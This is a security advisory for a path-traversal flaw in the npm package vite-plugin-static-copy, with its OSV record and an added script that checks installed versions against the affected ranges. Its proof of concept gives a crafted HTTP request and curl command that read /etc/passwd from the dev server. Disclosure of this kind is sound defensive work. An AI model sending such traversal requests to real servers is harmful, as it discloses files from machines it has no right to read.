GHSA-PP7P-Q8FX-2968

Vulnerability from github – Published: 2025-08-21 14:53 – Updated: 2025-08-21 19:16
Summary
vite-plugin-static-copy files not included in `src` are possible to access with a crafted request
Details

Summary

Files not included in `src` were accessible with a crafted request.

Impact

Only apps explicitly exposing the Vite dev server to the network (using `--host` or the `server.host` config option) are affected.

Arbitrary files readable by the user running the dev server can be disclosed by exploiting this vulnerability.

Details

Consider the following configuration in `vite.config.ts`:

import { defineConfig } from 'vite'
import { viteStaticCopy } from 'vite-plugin-static-copy'

export default defineConfig({
  plugins: [
    viteStaticCopy({
      targets: [
        {
          src: "./public/images",
          dest: "./",
        },
      ],
    }),
  ],
});

Only the files under `./public/images` are expected to be served. By abusing this vulnerability, an attacker can read arbitrary files on the filesystem of the machine running the dev server.

PoC

I've attached a demo app to showcase the bug.

Run it with `npm run dev` and issue the following HTTP request:

GET /static/images/../../../../../../../etc/passwd HTTP/1.1
Host: localhost:3001
Content-Length: 2

OR

curl --path-as-is -i -s -k -X $'GET' \
    -H $'Host: localhost:3001' -H $'Content-Length: 2' \
    --data-binary $'\x0d\x0a' \
    $'http://localhost:3001/static/images/../../../../../../../etc/passwd'

Observe that the /etc/passwd file is included in the response.

[Screenshot from the original advisory (2025-08-16), not reproduced here]


{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.1.1"
      },
      "package": {
        "ecosystem": "npm",
        "name": "vite-plugin-static-copy"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.1.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.3.1"
      },
      "package": {
        "ecosystem": "npm",
        "name": "vite-plugin-static-copy"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.4.3"
            },
            {
              "fixed": "2.3.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-57753"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-21T14:53:52Z",
    "nvd_published_at": "2025-08-21T16:15:34Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nFiles not included in `src` was possible to access with a crafted request.\n\n### Impact\n\nOnly apps explicitly exposing the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\n\nArbitrary files can be disclosed by exploiting this vulnerability.\n\n### Details\n\nConsider the following configuration in used by `vite.config.ts`:\n\n```ts\nimport { defineConfig } from \u0027vite\u0027\nimport { viteStaticCopy } from \u0027vite-plugin-static-copy\u0027\n\nexport default defineConfig({\n    plugins: [\n      viteStaticCopy({\n        targets: [\n          {\n            src: \"./public/images\",\n            dest: \"./\",\n          },\n        ],\n      }),\n    ],\n  });\n```\n\nThe files under the `./public/images` is only expected to be served. Abusing this vulnerability, an attacker can access arbitrary files on the filesystem.\n\n### PoC\nI\u0027ve attached a demo app to showcase the bug.\n\nRun it with `npm run dev` and issue the following HTTP request\n\n```\nGET /static/images/../../../../../../../etc/passwd HTTP/1.1\nHost: localhost:3001\nContent-Length: 2\n```\nOR \n```\ncurl --path-as-is -i -s -k -X $\u0027GET\u0027 \\\n    -H $\u0027Host: localhost:3001\u0027 -H $\u0027Content-Length: 2\u0027 \\\n    --data-binary $\u0027\\x0d\\x0a\u0027 \\\n    $\u0027http://localhost:3001/static/images/../../../../../../../etc/passwd\u0027\n```\nObserve that the `/etc/passwd` file is included in the response.\n\n\u003cimg width=\"1289\" height=\"449\" alt=\"Screenshot 2025-08-16 at 10 27 11\u202fPM\" src=\"https://github.com/user-attachments/assets/4de12612-7b86-44d7-a403-c76f12832e37\" /\u003e",
  "id": "GHSA-pp7p-q8fx-2968",
  "modified": "2025-08-21T19:16:58Z",
  "published": "2025-08-21T14:53:52Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/sapphi-red/vite-plugin-static-copy/security/advisories/GHSA-pp7p-q8fx-2968"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57753"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sapphi-red/vite-plugin-static-copy/commit/0bc6b49ed72b46eecfc9682045f4b46a19694969"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sapphi-red/vite-plugin-static-copy/commit/4627afb8582083eab733881d3d974e1c1f23997d"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/sapphi-red/vite-plugin-static-copy"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sapphi-red/vite-plugin-static-copy/releases/tag/vite-plugin-static-copy%402.3.2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sapphi-red/vite-plugin-static-copy/releases/tag/vite-plugin-static-copy%403.1.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "vite-plugin-static-copy files not included in `src` are possible to access with a crafted request"
}
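The `affected` ranges in the record above are what a dependency check has to evaluate. The following is an added example, not part of the advisory record: it encodes the two ECOSYSTEM ranges (affected when `introduced <= version < fixed`), compares an installed version against them, and walks a tree in the shape printed by `npm ls --json` to find nested copies. Version parsing is simplified to `major.minor.patch` with no prerelease tags, and the `npm ls` sample is constructed for the example.

```javascript
// Added illustration, not part of the advisory record: checking installed
// vite-plugin-static-copy versions against the OSV "affected" ranges above.
// Version comparison is simplified to major.minor.patch (no prerelease tags);
// the npm ls sample below is constructed for the example.
const PACKAGE = 'vite-plugin-static-copy';

// The two ECOSYSTEM ranges from the advisory: affected iff introduced <= v < fixed.
const AFFECTED_RANGES = [
  { introduced: '3.0.0', fixed: '3.1.2' },
  { introduced: '0.4.3', fixed: '2.3.2' },
];

function parseSemver(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)$/.exec(String(v).trim());
  if (!m) throw new Error(`unsupported version string: ${v}`);
  return [Number(m[1]), Number(m[2]), Number(m[3])];
}

function compareSemver(a, b) {
  const x = parseSemver(a), y = parseSemver(b);
  for (let i = 0; i < 3; i++) {
    if (x[i] !== y[i]) return x[i] < y[i] ? -1 : 1;
  }
  return 0;
}

// Returns the matching range (so the caller knows which fixed version to move to),
// or null when the version lies outside every affected range.
function affectedRangeFor(version, ranges = AFFECTED_RANGES) {
  return ranges.find(r =>
    compareSemver(version, r.introduced) >= 0 &&
    (r.fixed === undefined || compareSemver(version, r.fixed) < 0)) || null;
}

// Walk the tree printed by `npm ls --json` and collect every installed copy
// of the package, including transitive ones nested under other dependencies.
function findInstalledVersions(npmLsTree, name = PACKAGE) {
  const found = new Set();
  const walk = deps => {
    for (const [dep, info] of Object.entries(deps || {})) {
      if (dep === name && info.version) found.add(info.version);
      walk(info.dependencies);
    }
  };
  walk(npmLsTree.dependencies);
  return [...found];
}

// One row per installed version: whether it is affected, and the fix to upgrade to.
function audit(npmLsTree) {
  return findInstalledVersions(npmLsTree).map(version => {
    const range = affectedRangeFor(version);
    return { version, affected: range !== null, upgradeTo: range ? range.fixed : null };
  });
}

// Constructed sample of `npm ls --json` output: one affected top-level copy and
// one already-fixed copy nested under a hypothetical internal preset package.
const SAMPLE_NPM_LS = {
  name: 'demo-app',
  version: '1.0.0',
  dependencies: {
    'vite-plugin-static-copy': { version: '3.1.1' },
    'some-internal-preset': {
      version: '0.1.0',
      dependencies: { 'vite-plugin-static-copy': { version: '2.3.2' } },
    },
  },
};

console.log(audit(SAMPLE_NPM_LS));
```

Feed it real data with `npm ls vite-plugin-static-copy --json` piped through `JSON.parse`; both major lines have a fixed release (2.3.2 and 3.1.2), so the row's `upgradeTo` is the minimal move that clears the advisory without crossing a major version.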